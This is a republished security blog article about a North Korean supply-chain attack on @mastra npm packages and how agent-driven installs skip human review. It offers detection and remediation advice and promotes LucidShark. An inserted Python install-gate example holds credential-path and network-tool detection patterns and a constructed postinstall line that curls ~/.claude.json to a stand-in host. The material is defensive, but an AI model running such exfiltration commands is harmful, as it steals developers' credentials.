{"slug": "nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages", "title": "Nation-State Actors Are Now Targeting Your AI Agent's npm Packages", "summary": "Microsoft Threat Intelligence reported that North Korean state-sponsored actor Sapphire Sleet compromised over 140 packages in the @mastra npm scope, targeting developers building AI coding tools. The attack used a postinstall hook to steal AI provider API keys, cloud credentials, and CI/CD tokens, marking a strategic pivot by nation-state actors toward AI developer infrastructure.", "body_md": "*This article was originally published on LucidShark Blog.*\n\nOn June 17, 2026, Microsoft Threat Intelligence published a report attributing a supply chain attack on more than 140 packages in the `@mastra` npm scope to **Sapphire Sleet**, a North Korean state-sponsored threat actor. Mastra is a TypeScript framework for building agentic AI applications. Its packages are used by teams building Claude Code integrations, MCP servers, and autonomous coding pipelines. The malicious code ran from a `postinstall` hook. The payload stole AI provider API keys, cloud credentials, and CI/CD tokens.\n\nThis is not a story about an opportunistic criminal trying to make a quick profit from stolen package manager credentials. This is a nation-state actor making a deliberate, strategic decision that the most valuable target in modern software development is the developer building AI coding tools.\n\n**Scope of the Mastra attack:** 140+ packages across the `@mastra` scope and the unscoped `mastra` package were compromised in a coordinated campaign attributed by Microsoft Threat Intelligence to Sapphire Sleet (also tracked as BlueNoroff). Affected versions contained a `postinstall` payload designed to exfiltrate AI API keys, GitHub tokens, and cloud service credentials from developer machines.\n\nThe attack followed the same broad pattern as the Miasma Red Hat npm campaign from June 1, but with a critical difference in targeting. 
Where Miasma went after Red Hat infrastructure teams, Sapphire Sleet went after AI tool builders specifically.\n\nThe attack injected a `postinstall` script into compromised package versions. When a developer ran `npm install`, the hook executed as part of the install, with nothing in the normal npm output to indicate it, and scanned the local environment for:\n\n- AI provider API keys: Anthropic, OpenAI, Gemini, Mistral\n- GitHub personal access tokens and fine-grained tokens\n- AWS, GCP, and Azure credential files\n- Claude Code configuration files (`~/.claude.json` and `~/.claude/`)\n- MCP server OAuth tokens stored in Claude Code's config\n\nThe exfiltration used an HTTPS beacon to attacker-controlled infrastructure. The full execution completed in under two seconds, before most developers would notice anything amiss in the terminal output.\n\n**Timeline:** Malicious versions were published between June 14 and June 17, 2026. Microsoft Threat Intelligence published the attribution report on June 17. Affected packages were removed from npm within hours of disclosure. Developers who ran `npm install` on any Mastra package between June 14 and June 17 should assume credential compromise and rotate immediately.\n\nThe strategic logic is clear once you map what a developer machine holds compared to any other target in the organization.\n\nA developer building AI coding infrastructure has, in a typical session:\n\n- An Anthropic API key, often with no spend cap, capable of generating thousands of dollars in usage or accessing shared team workspaces\n- A GitHub PAT with write access to the repositories being worked on\n- Cloud credentials (AWS, GCP, Azure) for the environments the agent deploys to\n- MCP OAuth tokens granting access to Jira, Confluence, Linear, Slack\n- Local access to the codebase itself, often including internal services, private endpoints, and embedded secrets in config files\n\nThis is a higher-value credential bundle than what lives on most corporate workstations. 
It also lives on a machine where the developer is constantly installing new packages, spinning up new MCP servers, and integrating new tools. The attack surface is not static: it grows every time the developer adds a new dependency to an AI workflow.\n\nSapphire Sleet has previously focused on financial services targets, cryptocurrency exchanges, and defense contractors. The pivot to AI developer tooling is a signal that state actors have mapped the credential landscape and identified AI coding tool developers as a high-yield target category.\n\nTraditional supply chain defenses assume a human in the loop. A developer who is suspicious of a package can review its source before running it. A security team can add a mandatory approval step before new packages are introduced to a project.\n\nAI coding agents break this assumption entirely.\n\nWhen Claude Code decides to install a dependency as part of an agentic workflow, the installation happens automatically. The agent reads the task, determines that `@mastra/core` is needed, runs `npm install @mastra/core`, and proceeds. No human reviews the package. No human approves the install. The `postinstall` hook executes with the developer's full filesystem permissions (npm runs lifecycle scripts as the invoking user, with that user's environment), including read access to every credential file on the machine, before a human sees any output at all.\n\n```\n# This is what an autonomous Claude Code install looks like\n# The agent selects the package, installs it, and the postinstall fires\n# before any human review can occur\n\n$ claude -p \"set up mastra agentic framework for this project\"\n> Installing @mastra/core@0.11.4...\n> Running postinstall...    ← malicious payload fires here, silently\n> Done in 2.8s\n> Framework initialized. Here is your starter config:\n```\n\nThe developer sees a successful install. The payload has already run. 
The credentials are already gone.\n\nFour mechanisms that developers typically rely on for supply chain protection all failed against this attack:\n\n**npm audit:** The malicious versions had no advisory at installation time. `npm audit` checks the dependency tree against the npm advisory database, which is only populated after a malicious package or vulnerability is discovered and reported. It is inherently retrospective. Packages are clean until they are not.\n\n**SLSA provenance:** The attackers did not need to forge anything. As in the Miasma campaign, they obtained a legitimate GitHub OIDC token from a compromised CI/CD pipeline and used it to publish packages with valid, verifiable SLSA provenance. Provenance attests that a package was built by a particular workflow in a particular repository; it says nothing about whether that workflow was itself compromised. The packages passed `npm audit signatures` and appeared to have a legitimate supply chain.\n\n**Dependabot / Renovate:** These tools alert on known-vulnerable versions. They do not inspect package behavior or flag packages with newly added install scripts.\n\n**Code review:** The malicious code was in the `postinstall` script of a transitive dependency, not in the application source. Most teams do not review transitive dependency install scripts as part of their PR process.\n\n**The core problem:** Every standard supply chain defense is reactive. It assumes you can wait until a vulnerability is known, documented, and added to a feed. Against a nation-state actor publishing a malicious package and pulling it within hours of discovery, the window between \"clean\" and \"known bad\" is the entire attack window.\n\nThe only class of defense that works against zero-day supply chain attacks is behavioral and reputational analysis run *before* the install script executes.\n\n
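
What that pre-install analysis looks like in working form, as an added Python example that is not code from the article or from LucidShark: a gate that takes the lockfile an install *would* produce, compares it against the last known-clean lockfile, and inspects the install scripts of every package that newly gained one before npm runs them. It implements the signals listed next (a new `postinstall` in a previously clean package, base64 content and network calls in the script) and the known-clean lockfile comparison the article recommends at the end. Assumptions: npm 7 or newer lockfiles, which carry the `hasInstallScript` flag; the candidate lockfile is produced with `npm install --package-lock-only --ignore-scripts <spec>`, which updates `package-lock.json` without touching `node_modules` or running scripts; published manifests are read from the tarball fetched by `npm pack --ignore-scripts`. The indicator patterns beyond base64 and network calls, the `gate()` policy, and the sample lockfiles (`example-framework`, `native-addon`) and script text are constructed for this example and are not the Mastra payload.

```python
# Added example (not from the article or LucidShark): gate an npm install on what
# its lifecycle scripts contain, before npm ever runs them.
import json
import re
import subprocess
import tarfile
import tempfile
from pathlib import Path

HOOKS = ('preinstall', 'install', 'postinstall')

# Indicators to look for in install-script text. base64 blobs and network calls are
# the article's signals; the other three are this example's additions.
INDICATORS = {
    'base64-blob': re.compile(r'[A-Za-z0-9+/]{40,}={0,2}'),
    'base64-decode': re.compile(r'base64|atob[(]'),
    'network': re.compile(r'https?://|curl |wget |fetch[(]|https?[.]request|net[.]connect'),
    'dynamic-exec': re.compile(r'eval[(]|new Function[(]|child_process'),
    'credential-paths': re.compile(r'[.]claude|[.]aws/|[.]npmrc|[.]config/gcloud|[.]azure|GITHUB_TOKEN'),
}


def scripted(lock):
    '''{path: meta} for lockfile v2/v3 entries that npm flagged with hasInstallScript.'''
    return {p: m for p, m in lock.get('packages', {}).items() if m.get('hasInstallScript')}


def newly_scripted(clean_lock, candidate_lock):
    '''Packages that would run install scripts now but did not in the known-clean tree.'''
    before = scripted(clean_lock)
    findings = []
    for path, meta in scripted(candidate_lock).items():
        if path in before and before[path].get('version') == meta.get('version'):
            continue  # same version already ran scripts in the known-clean tree
        prev = clean_lock.get('packages', {}).get(path, {}).get('version')
        findings.append({
            'package': path.rsplit('node_modules/', 1)[-1] or '(root)',
            'version': meta.get('version'),
            'previous': prev,
        })
    return findings


def script_indicators(scripts):
    '''Map each lifecycle hook to the indicator names its command text matches.'''
    hits = {}
    for hook in HOOKS:
        matched = [name for name, rx in INDICATORS.items() if rx.search(scripts.get(hook, ''))]
        if matched:
            hits[hook] = matched
    return hits


def scripts_from_tarball(spec, npm='npm'):
    '''Download the published tarball with scripts disabled and read its package.json.'''
    with tempfile.TemporaryDirectory() as tmp:
        out = subprocess.run([npm, 'pack', spec, '--ignore-scripts'],
                             cwd=tmp, capture_output=True, text=True, check=True)
        tgz = Path(tmp, out.stdout.strip().splitlines()[-1])  # npm prints the filename last
        with tarfile.open(tgz) as tar:
            manifest = json.load(tar.extractfile('package/package.json'))
    return manifest.get('scripts', {})


def gate(clean_lock, candidate_lock, fetch_scripts=scripts_from_tarball):
    '''Return (allow, findings): block when a newly scripted package shows an indicator,
    otherwise allow but report every newly scripted package for human review.'''
    findings = newly_scripted(clean_lock, candidate_lock)
    for f in findings:
        spec = f['package'] + '@' + str(f['version'])
        f['indicators'] = script_indicators(fetch_scripts(spec))
    allow = not any(f['indicators'] for f in findings)
    return allow, findings


# Constructed sample data: the candidate lockfile bumps one package to a version that
# gained a postinstall; native-addon already had one in the clean tree and is not new.
CLEAN_LOCK = {'lockfileVersion': 3, 'packages': {
    '': {'name': 'agent-app', 'version': '1.0.0'},
    'node_modules/example-framework': {'version': '0.11.3'},
    'node_modules/native-addon': {'version': '2.0.0', 'hasInstallScript': True},
}}
CANDIDATE_LOCK = {'lockfileVersion': 3, 'packages': {
    '': {'name': 'agent-app', 'version': '1.0.0'},
    'node_modules/example-framework': {'version': '0.11.4', 'hasInstallScript': True},
    'node_modules/native-addon': {'version': '2.0.0', 'hasInstallScript': True},
}}
# Constructed script text shaped like an exfiltrating hook (not the real payload, not runnable).
SUSPICIOUS_SCRIPTS = {'postinstall': 'node -e eval(Buffer.from(Q29uc3RydWN0ZWQgc2FtcGxlIGJsb2IgZm9yIHRoZSBkZXRlY3Rvcg==,base64).toString()) && curl -s https://beacon.invalid/c -d @$HOME/.claude.json'}
BENIGN_SCRIPTS = {'install': 'node-gyp rebuild'}

if __name__ == '__main__':
    # Real use: clean = last committed package-lock.json, candidate = the one written by
    # npm install --package-lock-only --ignore-scripts <spec>; scripts come from npm pack.
    allow, findings = gate(CLEAN_LOCK, CANDIDATE_LOCK, lambda spec: SUSPICIOUS_SCRIPTS)
    print('allow install:', allow)
    for finding in findings:
        print(finding)
```

An agent tool wrapper would call `gate()` and only run the real `npm install` when it returns allow, or after a human has looked at the findings it reports; a newly scripted package with no indicators is still listed, because the absence of a pattern match is not evidence of a clean script.
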
Checking the package itself rather than its advisory status means looking for signals like these, all of which were present in the malicious Mastra versions before the payload ran:\n\n- **New postinstall script in a previously clean package:** The malicious versions added a `postinstall` field that did not exist in prior versions. A diff of the package manifest across versions is a high-signal indicator.\n- **Publish timestamp anomaly:** Multiple versions of related packages published within a short window (hours) is a pattern consistent with a compromised publishing pipeline.\n- **Script content analysis:** The postinstall script contained base64-encoded content and a network request. Both are strong indicators of malicious intent in an install hook.\n- **Package reputation score:** A secondary package in the `@mastra` scope with a low download count and no prior install scripts that suddenly gains a postinstall hook is anomalous.\n\nHere is a quick local audit you can run right now to identify packages with lifecycle scripts in your current project. It reads the `hasInstallScript` flag that npm 7 and later record in `package-lock.json` (the lockfile does not store the scripts themselves) and then reads each flagged package's installed `package.json` to list the actual hooks:\n\n```python\nimport json\nfrom pathlib import Path\n\nlock = json.loads(Path('package-lock.json').read_text())\npackages = lock.get('packages')\nif packages is None:\n    raise SystemExit('lockfileVersion 1 has no packages map; regenerate the lockfile with npm 7 or newer')\n\nrisky = []\nfor path, meta in packages.items():\n    # npm sets hasInstallScript when a package declares preinstall, install or postinstall.\n    if not meta.get('hasInstallScript'):\n        continue\n    # Hook names live in the installed manifest, not in the lockfile.\n    manifest = Path(path or '.', 'package.json')\n    hooks = []\n    if manifest.exists():\n        scripts = json.loads(manifest.read_text()).get('scripts', {})\n        hooks = [s for s in ('preinstall', 'install', 'postinstall') if s in scripts]\n    risky.append({\n        'name': path.rsplit('node_modules/', 1)[-1] or '(root)',\n        'version': meta.get('version', 'unknown'),\n        'hooks': hooks or ['(not installed yet; flagged in lockfile)'],\n        'resolved': meta.get('resolved', '')[:60],\n    })\n\nprint(f'Packages with lifecycle scripts: {len(risky)}')\nfor pkg in sorted(risky, key=lambda x: x['name']):\n    name, version, hooks, resolved = pkg['name'], pkg['version'], pkg['hooks'], pkg['resolved']\n    print(f'  {name}@{version}')\n    print(f'    hooks: {hooks}')\n    print(f'    source: {resolved}...')\n    print()\n```\n\nAny package in this list that you do not explicitly recognize and trust is worth auditing 
before the next `npm install` run.\n\nIf you installed any package in the `@mastra` scope between June 14 and June 17, 2026:\n\n- Rotate your Anthropic API key immediately at `console.anthropic.com`\n- Revoke and regenerate any GitHub personal access tokens\n- Rotate AWS, GCP, or Azure credentials used on the affected machine\n- Revoke MCP OAuth tokens in each connected service (Jira, GitHub, Confluence, Slack) and reissue them with the minimum required scopes\n- Check `~/.claude.json` and `~/.claude/` for stored credentials and rotate everything found there\n\nFor ongoing protection, add postinstall script auditing to your pre-commit or pre-install workflow. Before any `npm install` run in an AI-assisted project, check whether any package in the dependency tree has added or modified a lifecycle script compared to the last known-clean lockfile. The blunt control is `ignore-scripts=true` in `.npmrc`, which stops npm from running any lifecycle script at all; the few packages that genuinely need a build step then have to be rebuilt explicitly (for example `npm rebuild <package> --ignore-scripts=false`), which is the right place to put a human decision.\n\n**LucidShark includes dependency lifecycle script scanning as part of its local SCA pipeline.** Running `lucidshark analyze` in your project flags packages with postinstall hooks from unverified or recently modified publishers before they execute, alongside complexity, coverage, and duplication metrics. It runs entirely on your machine, with no data leaving your environment, and integrates with Claude Code via MCP so your agent gets structured feedback before installing flagged packages. 
Get started at [lucidshark.com](https://lucidshark.com) or install with `npm install -g lucidshark`.", "url": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages", "canonical_source": "https://dev.to/toniantunovic/nation-state-actors-are-now-targeting-your-ai-agents-npm-packages-3m0g", "published_at": "2026-06-25 16:19:21+00:00", "updated_at": "2026-06-25 16:43:55.120145+00:00", "lang": "en", "topics": ["ai-safety", "ai-infrastructure", "developer-tools"], "entities": ["Microsoft Threat Intelligence", "Sapphire Sleet", "BlueNoroff", "Mastra", "npm", "Anthropic", "OpenAI", "GitHub"], "alternates": {"html": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages", "markdown": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages.md", "text": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages.txt", "jsonld": "https://wpnews.pro/news/nation-state-actors-are-now-targeting-your-ai-agent-s-npm-packages.jsonld"}}